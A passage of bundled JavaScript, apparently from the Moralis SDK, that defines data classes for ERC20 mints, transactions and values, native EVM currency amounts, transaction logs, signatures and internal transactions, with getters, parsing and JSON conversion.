    Object.defineProperty(Erc20Mint.prototype, "chain", {
        /**
         * @returns the chain of the mint
         * @example mint.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "transactionHash", {
        /**
         * @returns the transaction hash of the mint
         * @example mint.transactionHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "value", {
        /**
         * @returns the value of the mint
         * @example mint.value // BigNumber
         */ get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "transactionIndex", {
        /**
         * @returns the transactionIndex of the mint
         * @example mint.transactionIndex // 3
         */ get: function() {
            return this._data.transactionIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "logIndex", {
        /**
         * @returns the logIndex of the mint
         * @example mint.logIndex // 2
         */ get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "tokenName", {
        /**
         * @returns The name of the token.
         * @example burn.tokenName // "Kylin Network"
         */ get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "tokenLogo", {
        /**
         * @returns The logo of the token
         * @example burn.tokenLogo // "https://cdn.moralis.io/eth/0x67b6d479c7bb412c54e03dca8e1bc6740ce6b99c.png"
         */ get: function() {
            return this._data.tokenLogo;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "tokenSymbol", {
        /**
         * @returns The symbol of the token.
         * @example burn.tokenSymbol // "KYL"
         */ get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Mint.prototype, "tokenDecimals", {
        /**
         * @returns The decimals of the token.
         * @example burn.tokenDecimals // 18
         */ get: function() {
            return this._data.tokenDecimals;
        },
        enumerable: false,
        configurable: true
    });
    Erc20Mint.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            contractAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.contractAddress),
            toWallet: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.toWallet),
            blockTimestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.blockTimestamp),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.value),
            transactionIndex: Number(data.transactionIndex),
            logIndex: Number(data.logIndex),
            tokenDecimals: Number(data.tokenDecimals)
        });
    };
    return Erc20Mint;
}();
/**
 * The Erc20Transaction is a representation of an Erc20 token transaction.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$99bc868996d177b5 = /** @class */ function() {
    function Erc20Transaction(data) {
        this._data = Erc20Transaction.parse(data);
    }
    /**
     * Create a new instance of Erc20Transaction from any valid input
     * @param data - the Erc20Transactionish type
     * @example
     * ```
     * const transfer = Erc20Transaction.create(data);
     *```
     */ Erc20Transaction.create = function(data) {
        if (data instanceof Erc20Transaction) return data;
        return new Erc20Transaction(data);
    };
    /**
     * Check the equality between two Erc20 transfers
     * @param dataA - The first transfer to compare
     * @param dataB - The second transfer to compare
     * @example Erc20Transaction.equals(dataA, dataB)
     * @returns true if the transfers are equal, false otherwise
     */ Erc20Transaction.equals = function(dataA, dataB) {
        var tokenA = Erc20Transaction.create(dataA);
        var tokenB = Erc20Transaction.create(dataB);
        return JSON.stringify(tokenA.toJSON()) === JSON.stringify(tokenB.toJSON());
    };
    /**
     * Checks the equality of the current trnasfer with another erc20 trnasfer
     * @param data - the transfer to compare with
     * @example transfer.equals(data)
     * @returns true if the transfers are equal, false otherwise
     */ Erc20Transaction.prototype.equals = function(data) {
        return Erc20Transaction.equals(this, data);
    };
    /**
     * @returns a JSON represention of the transfer.
     * @example transfer.toJSON()
     */ Erc20Transaction.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            address: data.address.toJSON(),
            blockNumber: data.blockNumber.toString(),
            toAddress: data.toAddress.toJSON(),
            fromAddress: data.fromAddress.toJSON(),
            value: data.value.toString()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ Erc20Transaction.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(Erc20Transaction.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example transfer.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "address", {
        /**
         * @returns the contract address of the transfer
         * @example transfer.address // EvmAddress
         */ get: function() {
            return this._data.address;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "contractAddress", {
        /**
         * @returns the contract address of the transfer
         * @example transfer.contractAddress // EvmAddress
         */ // Used since /erc20/transfers endpoints that return toAddress under a different name
        get: function() {
            return this._data.address;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "blockHash", {
        /**
         * @returns the block hash of the transfer
         * @example transfer.blockHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "blockNumber", {
        /**
         * @returns the block number of the transfer
         * @example transfer.blockNumber // BigNumber
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "blockTimestamp", {
        /**
         * @returns the block timestamp of the transfer
         * @example transfer.blockTimestamp // Date
         */ get: function() {
            return this._data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "chain", {
        /**
         * @returns the chain of the transfer
         * @example transfer.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "fromAddress", {
        /**
         * @returns the from address of the transfer
         * @example transfer.fromAddress // EvmAddress
         */ get: function() {
            return this._data.fromAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "fromWallet", {
        /**
         * @returns the from address of the transfer
         * @example transfer.fromWallet // EvmAddress
         */ // Used since /erc20/transfers endpoints that return toAddress under a different name
        get: function() {
            return this._data.fromAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "toAddress", {
        /**
         * @returns the to address of the transfer
         * @example transfer.toAddress // EvmAddress
         */ get: function() {
            return this._data.toAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "toWallet", {
        /**
         * @returns the to address of the transfer
         * @example transfer.toWallet // EvmAddress
         */ // Used since /erc20/transfers endpoints that return toAddress under a different name
        get: function() {
            return this._data.toAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "transactionHash", {
        /**
         * @returns the transaction hash of the transfer
         * @example transfer.transactionHash // "0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86"
         */ get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "value", {
        /**
         * @returns the value of the transfer
         * @example transfer.value // BigNumber
         */ get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "transactionIndex", {
        /**
         * @returns the transactionIndex of the transfer
         * @example transfer.transactionIndex // 3
         */ get: function() {
            return this._data.transactionIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "logIndex", {
        /**
         * @returns the logIndex of the transfer
         * @example transfer.logIndex // 2
         */ get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Transaction.prototype, "possibleSpam", {
        /**
         * @returns possibility of the token being a spam token
         * @example transfer.possibleSpam // true
         */ get: function() {
            return this._data.possibleSpam;
        },
        enumerable: false,
        configurable: true
    });
    Erc20Transaction.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.address),
            blockTimestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.blockTimestamp),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.toAddress),
            fromAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.fromAddress),
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.value),
            transactionIndex: Number(data.transactionIndex),
            logIndex: Number(data.logIndex)
        });
    };
    return Erc20Transaction;
}();
var $3dfc2d9370ba0cd1$var$EVM_ERC20_DEFAULT_DECIMALS = 18;
/**
 * The Erc20Value class is a MoralisData that references to a the value of an Erc20Token
 * It holds data about the data about the amount of tokens and the number of decimals.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$a94fa3bfa24fb2be = /** @class */ function() {
    function Erc20Value(amount, options) {
        var _this = this;
        var _a, _b, _c;
        /**
         * Displays the token in text format
         * @returns the value and also the token symbol if available
         * @example value.display();
         */ this.display = function() {
            if (!_this._token) return "".concat(_this.value);
            return "".concat(_this.value, " ").concat(_this._token.symbol);
        };
        this._value = Erc20Value.parse({
            amount: amount,
            decimals: (_c = (_a = options === null || options === void 0 ? void 0 : options.decimals) !== null && _a !== void 0 ? _a : (_b = options === null || options === void 0 ? void 0 : options.token) === null || _b === void 0 ? void 0 : _b.decimals) !== null && _c !== void 0 ? _c : $3dfc2d9370ba0cd1$var$EVM_ERC20_DEFAULT_DECIMALS,
            token: options === null || options === void 0 ? void 0 : options.token
        });
        if (options === null || options === void 0 ? void 0 : options.token) this._token = $3dfc2d9370ba0cd1$export$28ff99e69b404cc.create(options.token);
    }
    /**
     * Create a new instance of Erc20Value from any valid input
     * @param value - The value to create
     * @param options - The options for the token
     * @example Erc20Value.create(1000, { decimals: 3 });
     * @returns The created value
     * @throws CoreError if the value is invalid
     */ Erc20Value.create = function(value, options) {
        if (value instanceof Erc20Value) return value;
        return new Erc20Value(value, options);
    };
    /**
     * Compares two Erc20Valueish instances.
     * @param valueA - The first value to compare
     * @param valueB - The second value to compare
     * @returns True if the values are equal
     * @example
     * ```ts
     * const valueA = Erc20Value.create(1000, { decimals: 3 });
     * const valueB = Erc20Value.create(10000, { decimals: 4 });
     * Erc20Value.equals(valueA, valueB); // true
     * ```
     */ Erc20Value.equals = function(valueA, valueB) {
        var erc20ValueA = Erc20Value.create(valueA);
        var erc20ValueB = Erc20Value.create(valueB);
        return erc20ValueA.value === erc20ValueB.value;
    };
    /**
     * Compares Erc20Value with current instance.
     * @param value - The value to compare
     * @returns True if the values are equal
     * @example value.equals(valueA);
     */ Erc20Value.prototype.equals = function(value) {
        return Erc20Value.equals(this, value);
    };
    /**
     * Convert the value to a number
     * @returns the value in number format
     * @example value.toNumber();
     */ Erc20Value.prototype.toNumber = function() {
        return +this.value;
    };
    /**
     * Convert the value to a string
     * @returns the value in string format
     * @example value.toString();
     */ Erc20Value.prototype.toString = function() {
        return this.value;
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ Erc20Value.prototype.format = function() {
        return this.toString();
    };
    /**
     * Displays the token in JSON format
     * @returns the value and also the token if available
     * @example value.toJSON();
     */ Erc20Value.prototype.toJSON = function() {
        if (this.token) return {
            value: this.value,
            token: this.token.toJSON()
        };
        return {
            value: this.value
        };
    };
    Object.defineProperty(Erc20Value.prototype, "decimals", {
        /**
         * @returns the token decimals
         * @example value.decimals; // 15
         */ get: function() {
            return this._value.decimals;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Value.prototype, "amount", {
        /**
         * @returns the token amount
         * @example value.amount; // BigNumber
         */ get: function() {
            return this._value.amount;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Value.prototype, "value", {
        /**
         * @returns the token value
         * @example value.value; // "1000"
         */ get: function() {
            return this._value.amount.toDecimal(this.decimals);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(Erc20Value.prototype, "token", {
        /**
         * @returns the token
         * @example value.token; // Erc20Token
         */ get: function() {
            var _a;
            return (_a = this._token) !== null && _a !== void 0 ? _a : null;
        },
        enumerable: false,
        configurable: true
    });
    Erc20Value.parse = function(_a) {
        var amount = _a.amount, decimals = _a.decimals, token = _a.token;
        if (token && token.decimals && +token.decimals !== +decimals) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_DATA,
            message: "Decimals do not match"
        });
        return {
            amount: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(amount),
            decimals: +decimals
        };
    };
    return Erc20Value;
}();
var $3dfc2d9370ba0cd1$var$unitToDecimals = {
    ether: 18,
    finney: 15,
    szabo: 12,
    gwei: 9,
    mwei: 6,
    kwei: 3,
    wei: 0
};
/**
 * The EvmNative class is a MoralisData that references to the value of an EVM native currency (like ETH, BNB etc.)
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$62862bdd1f71aa78 = /** @class */ function() {
    function EvmNative(native, unit) {
        if (unit === void 0) unit = "ether";
        this.rawValue = EvmNative.parse(native, unit);
    }
    Object.defineProperty(EvmNative, "ONE_ETH", {
        /**
         * Returns value of one ether.
         *
         * @example EvmNative.ONE_ETH
         */ get: function() {
            return EvmNative.create(1, "ether");
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNative, "ONE_GWEI", {
        /**
         * Returns value of one gwei.
         *
         * @example EvmNative.ONE_GWEI
         */ get: function() {
            return EvmNative.create(1, "gwei");
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNative, "ONE_WEI", {
        /**
         * Returns value of one wei.
         *
         * @example EvmNative.ONE_WEI
         */ get: function() {
            return EvmNative.create(1, "wei");
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Create a new instance of EvmNative from any valid {@link EvmNativeish} value.
     * @param native - the value to create the EvmNative from
     * @param unit - the unit of the value (optional), defaults to `ether`
     * @returns a new instance of EvmNative
     * @example
     * ```ts
     * const native = EvmNative.create(2, 'gwei');
     * const native = EvmNative.create(2);
     * const native = EvmNative.create(2, 'wei');
     *```
     */ EvmNative.create = function(native, unit) {
        if (native instanceof EvmNative) return native;
        return new EvmNative(native, unit);
    };
    EvmNative.fromJSON = function(json) {
        return EvmNative.create(json, "wei");
    };
    EvmNative.parse = function(native, unit) {
        var decimals;
        if (typeof unit === "number") decimals = unit;
        else {
            if ($3dfc2d9370ba0cd1$var$unitToDecimals[unit] == null) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
                code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
                message: "Unit should be a decimal number or valid EvmNativeUnit string"
            });
            decimals = $3dfc2d9370ba0cd1$var$unitToDecimals[unit];
        }
        return (0, $10891f2cb3e98601$export$d97aa349ed20696).fromDecimal(native.toString(), decimals);
    };
    /**
     * Compares two EvmNative values.
     * @param valueA - the first value to compare
     * @param valueB - the second value to compare
     * @returns true if the values are equal
     * @example
     * ```ts
     * EvmNative.equals(EvmNative.create(1, 'ether'), EvmNative.create(1, 'ether')); // true
     * ```
     */ EvmNative.equals = function(valueA, valueB) {
        var evmNativeA = EvmNative.create(valueA);
        var evmNativeB = EvmNative.create(valueB);
        return evmNativeA.rawValue.equals(evmNativeB.rawValue);
    };
    /**
     * Compares EvmNative with current instance.
     * @param value - the value to compare with
     * @returns true if the values are equal
     * @example
     * ```ts
     * const native = EvmNative.create(1, 'gwei');
     * native.equals(EvmNative.create(1, 'ether')); // false
     * ```
     */ EvmNative.prototype.equals = function(value) {
        return EvmNative.equals(this, value);
    };
    /**
     * Converts the EvmNative to a string.
     * @returns the value of the EvmNative as a string
     * @example `native.toString()`
     */ EvmNative.prototype.toString = function() {
        return this.wei;
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmNative.prototype.format = function() {
        return this.toString();
    };
    Object.defineProperty(EvmNative.prototype, "value", {
        /**
         * @returns the value of the EvmNative as a BigNumber
         * @example `native.value`
         */ get: function() {
            return this.rawValue;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNative.prototype, "wei", {
        /**
         * Converts the EvmNative to a string representation of the value in wei.
         * @returns the value of the EvmNative as a string
         * @example `native.wei`
         */ get: function() {
            return this.value.toString();
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNative.prototype, "gwei", {
        /**
         * Converts the EvmNative to a string representation of the value in gwei.
         * @returns the value of the EvmNative as a string
         * @example `native.gwei`
         */ get: function() {
            return this.rawValue.toDecimal($3dfc2d9370ba0cd1$var$unitToDecimals["gwei"]);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmNative.prototype, "ether", {
        /**
         * Converts the EvmNative to a string representation of the value in ether.
         * @returns the value of the EvmNative as a string
         * @example `native.ether`
         */ get: function() {
            return this.rawValue.toDecimal($3dfc2d9370ba0cd1$var$unitToDecimals["ether"]);
        },
        enumerable: false,
        configurable: true
    });
    EvmNative.prototype.toJSON = function() {
        return this.toString();
    };
    return EvmNative;
}();
/**
 * The EvmTransactionLog class is a MoralisData that references an EVM transaction log.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$138ade50fb8052f5 = /** @class */ function() {
    function EvmTransactionLog(value) {
        this._value = EvmTransactionLog.parse(value);
    }
    /**
     * Create a new instance of EvmTransactionLog from any valid address input
     *
     * @example
     * ```
     * const log = EvmTransactionLog.create(value, core);
     * ```
     * @param value - A valid EvmTransactionLogish
     * @param core - The Core instance
     */ EvmTransactionLog.create = function(value) {
        if (value instanceof EvmTransactionLog) return value;
        return new EvmTransactionLog(value);
    };
    EvmTransactionLog.parse = function(value) {
        return {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(value.chain),
            logIndex: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(value.logIndex, function(index) {
                return +index;
            }),
            transactionHash: value.transactionHash,
            transactionIndex: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(value.transactionIndex),
            data: value.data,
            topics: value.topics,
            blockHash: value.blockHash,
            blockNumber: value.blockNumber,
            blockTimestamp: value.blockTimestamp,
            address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(value.address)
        };
    };
    /**
     * Compares the log to another log for equality.
     *
     * @param value - The value to compare with
     * @returns true if the logs are equal, otherwise false
     * @example
     * ```ts
     * log.equals(log);
     * ```
     */ EvmTransactionLog.prototype.equals = function(value) {
        return value._value.transactionHash === this._value.transactionHash && value._value.address.equals(this._value.address) && value._value.logIndex === this._value.logIndex && value._value.chain.equals(this._value.chain);
    };
    /**
     * Converts the log to a JSON object.
     *
     * @returns the EvmTransactionLog as a JSON object
     * @example
     * ```ts
     * log.toJSON();
     * ```
     */ EvmTransactionLog.prototype.toJSON = function() {
        var value = this._value;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, value), {
            address: value.address.toJSON(),
            chain: value.chain.toJSON()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmTransactionLog.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmTransactionLog.prototype, "result", {
        /**
         * Returns the processed Erc20Token.
         *
         * @returns the EvmTransactionLog value
         * @example
         * ```ts
         * log.result;
         *  ```
         */ get: function() {
            return this._value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "transactionHash", {
        /**
         * @returns the transaction hash of the log.
         *
         * @example
         * ```ts
         * log.transactionHash; // "0xdd9006489e46670e0e85d1fb88823099e7f596b08aeaac023e9da0851f26fdd5"
         * ```
         */ get: function() {
            return this._value.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "address", {
        /**
         * Returns the address of the log.
         *
         * @example
         * ```ts
         * log.address; // EvmAddress
         * ```
         */ get: function() {
            return this._value.address;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "chain", {
        /**
         * Returns the chain of the log.
         *
         * @example
         * ```ts
         * log.chain; // EvmChain
         * ```
         */ get: function() {
            return this._value.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "logIndex", {
        /**
         * @returns the log index of the log.
         *
         * @example
         * ```ts
         * log.logIndex; // 273
         * ```
         */ get: function() {
            return this._value.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "data", {
        /**
         * @returns the data of the log.
         *
         * @example
         * ```ts
         * log.data; // "0x00000000000000000000000000000000000000000000000de05239bccd4d537400000000000000000000000000024dbc80a9f80e3d5fc0a0ee30e2693781a443"
         * ```
         */ get: function() {
            return this._value.data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "topics", {
        /**
         * @returns the topics of the log.
         *
         * @example
         * ```ts
         * log.topic0; // ["0x0000000000000000000000000000000000000000000000000000000000000001", "0x0000000000000000000000000000000000000000000000000000000000000002"]
         * ```
         */ get: function() {
            return this._value.topics;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "blockHash", {
        /**
         * @returns the block hash of the log.
         *
         * @example
         * ```ts
         * log.blockHash; // "0x9b559aef7ea858608c2e554246fe4a24287e7aeeb976848df2b9a2531f4b9171"
         * ```
         */ get: function() {
            return this._value.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "blockNumber", {
        /**
         * @returns the block number of the log.
         *
         * @example
         * ```ts
         * log.blockNumber; // 12386788
         * ```
         */ get: function() {
            return this._value.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionLog.prototype, "blockTimestamp", {
        /**
         * @returns the block timestamp of the log.
         *
         * @example
         * ```ts
         * log.blockTimestamp; // "2021-05-07T11:08:35.000Z"
         * ```
         */ get: function() {
            return this._value.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    return EvmTransactionLog;
}();
/**
 * Represents of a signed EVM signature
 * Can be created with a valid r,s,v signature or a hex string
 */ var $3dfc2d9370ba0cd1$export$8da68a2b5f3f6f70 = /** @class */ function() {
    function EvmSignature(data) {
        this._data = EvmSignature.parse(data);
    }
    EvmSignature.create = function(data) {
        if (data instanceof EvmSignature) return data;
        return new EvmSignature(data);
    };
    EvmSignature.equals = function(dataA, dataB) {
        var signatureA = EvmSignature.create(dataA);
        var signatureB = EvmSignature.create(dataB);
        return signatureA.serialized === signatureB.serialized;
    };
    /**
     * Checks the equality of the current transfer instance with another nft transfer
     * @param data - the transfer to compare with
     * @example transaction.equals(data)
     * @returns true if the transfers are equal, false otherwise
     */ EvmSignature.prototype.equals = function(data) {
        return EvmSignature.equals(this, data);
    };
    Object.defineProperty(EvmSignature.prototype, "r", {
        get: function() {
            return this._data.r;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmSignature.prototype, "s", {
        get: function() {
            return this._data.s;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmSignature.prototype, "v", {
        get: function() {
            return this._data.v;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmSignature.prototype, "serialized", {
        get: function() {
            return (0, $7b88b6e03e4708f2$export$71bb9d78a59bbe25)(this._data);
        },
        enumerable: false,
        configurable: true
    });
    EvmSignature.prototype.toJSON = function() {
        return {
            r: this.r,
            s: this.s,
            v: this.v.toString()
        };
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmSignature.prototype.format = function() {
        return this.serialized;
    };
    EvmSignature.parse = function(data) {
        if (typeof data === "string") return (0, $7b88b6e03e4708f2$export$7fb170f1e457988f)(data);
        return (0, $7b88b6e03e4708f2$export$7fb170f1e457988f)({
            r: (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)((0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.r).toBigInt()),
            s: (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)((0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.s).toBigInt()),
            v: +data.v
        });
    };
    return EvmSignature;
}();
/**
 * The EvmTranaction is a representation of a published transaction.
 *
 * Use this class any time you work with a transaction.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$9a834303a812ec41 = /** @class */ function() {
    function EvmInternalTransaction(data) {
        this._data = EvmInternalTransaction.parse(data);
    }
    /**
     * Create a new instance of EvmInternalTransaction from any valid transaction input
     * @param data - the EvmInternalTransactionish type
     * @example
     * ```
     * const transaction = EvmInternalTransaction.create(data);
     *```
     */ EvmInternalTransaction.create = function(data) {
        if (data instanceof EvmInternalTransaction) return data;
        return new EvmInternalTransaction(data);
    };
    /**
     * Check the equality between two Evm internal transactions
     * @param dataA - The first transaction
     * @param dataB - The second transaction
     * @example
     * ```ts
     * EvmInternalTransaction.equals(dataA, dataB)
     * ```
     */ EvmInternalTransaction.equals = function(dataA, dataB) {
        var transactionA = EvmInternalTransaction.create(dataA);
        var transactionB = EvmInternalTransaction.create(dataB);
        if (!transactionA._data.chain.equals(transactionB._data.chain)) return false;
        if (transactionA._data.transactionHash !== transactionB._data.transactionHash) return false;
        return true;
    };
    /**
     * Checks the equality of the current transaction with another evm transaction
     * @param data - the transaction to compare with
     * @example
     * ```ts
     * transaction.equals(data)
     * ```
     */ EvmInternalTransaction.prototype.equals = function(data) {
        return EvmInternalTransaction.equals(this, data);
    };
    EvmInternalTransaction.prototype.toJSON = function() {
        var _a, _b, _c, _d, _e, _f, _g;
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            to: (_a = data.to) === null || _a === void 0 ? void 0 : _a.toJSON(),
            from: (_b = data.from) === null || _b === void 0 ? void 0 : _b.toJSON(),
            gas: (_c = data.gas) === null || _c === void 0 ? void 0 : _c.toString(),
            gasUsed: (_d = data.gasUsed) === null || _d === void 0 ? void 0 : _d.toString(),
            value: (_e = data.value) === null || _e === void 0 ? void 0 : _e.toString(),
            chain: (_f = data.chain) === null || _f === void 0 ? void 0 : _f.toJSON(),
            blockNumber: (_g = data.blockNumber) === null || _g === void 0 ? void 0 : _g.toString()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmInternalTransaction.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmInternalTransaction.prototype, "result", {
        get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "blockNumber", {
        get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "blockHash", {
        get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "type", {
        get: function() {
            return this._data.type;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "from", {
        get: function() {
            return this._data.from;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "to", {
        get: function() {
            return this._data.to;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "value", {
        get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "gas", {
        get: function() {
            return this._data.gas;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "gasUsed", {
        get: function() {
            return this._data.gasUsed;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "input", {
        get: function() {
            return this._data.input;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmInternalTransaction.prototype, "output", {
        get: function() {
            return this._data.output;
        },
        enumerable: false,
        configurable: true
    });
    EvmInternalTransaction.parse = function(data) {
        return {
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            from: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.from),
            to: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.to),
            transactionHash: data.transactionHash,
            gas: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.gas),
